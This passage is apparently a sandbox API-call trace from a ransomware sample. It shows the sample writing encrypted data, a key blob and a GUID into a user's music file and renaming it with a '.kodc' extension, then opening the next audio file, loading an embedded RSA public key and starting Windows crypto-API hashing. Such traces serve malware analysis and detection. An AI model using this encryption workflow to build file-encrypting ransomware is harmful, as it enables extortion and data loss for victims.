(HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.041] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16000) returned 0x9ba4d90 [0099.041] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9da38 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331acd0 [0099.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9da80 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ace8 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad18 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad30 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.042] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad18 | out: hHeap=0x630000) returned 1 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad30 | out: hHeap=0x630000) returned 1 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad30 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ad18 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad30 | out: hHeap=0x630000) returned 1 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad18 | out: hHeap=0x630000) returned 1 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.043] GetCurrentThreadId () returned 0x42c [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8ffb8 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.043] GetCurrentThreadId () returned 0x42c [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad18 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad30 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad00 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad48 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad18 | out: hHeap=0x630000) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad18 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad18 | out: hHeap=0x630000) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad48 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad30 | out: hHeap=0x630000) returned 1 [0099.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad00 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ace8 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9da80 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.046] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x15ff9, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x15ff9, lpOverlapped=0x0) returned 1 [0099.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0099.047] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15ffe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.047] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0099.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0099.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.047] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.047] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.047] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.047] CloseHandle (hObject=0x5cc) returned 1 [0099.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.056] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gWe58.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gwe58.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gWe58.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gwe58.mp3.kodc")) returned 1 [0099.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.057] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.058] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d353ea0, ftCreationTime.dwHighDateTime=0x1d5b82c, ftLastAccessTime.dwLowDateTime=0x517d2750, ftLastAccessTime.dwHighDateTime=0x1d5bef1, ftLastWriteTime.dwLowDateTime=0x517d2750, ftLastWriteTime.dwHighDateTime=0x1d5bef1, nFileSizeHigh=0x0, nFileSizeLow=0x4eee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gXSOfYbcO.wav", cAlternateFileName="GXSOFY~1.WAV")) returned 1 [0099.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gXSOfYbcO.wav") returned=".wav" [0099.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gXSOfYbcO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gxsofybco.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.058] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=20206) returned 1 [0099.058] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.061] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4ec8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.061] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.062] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.062] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x4eee, lpOverlapped=0x0) returned 1 [0099.062] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.062] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.063] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.063] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.063] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.063] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, 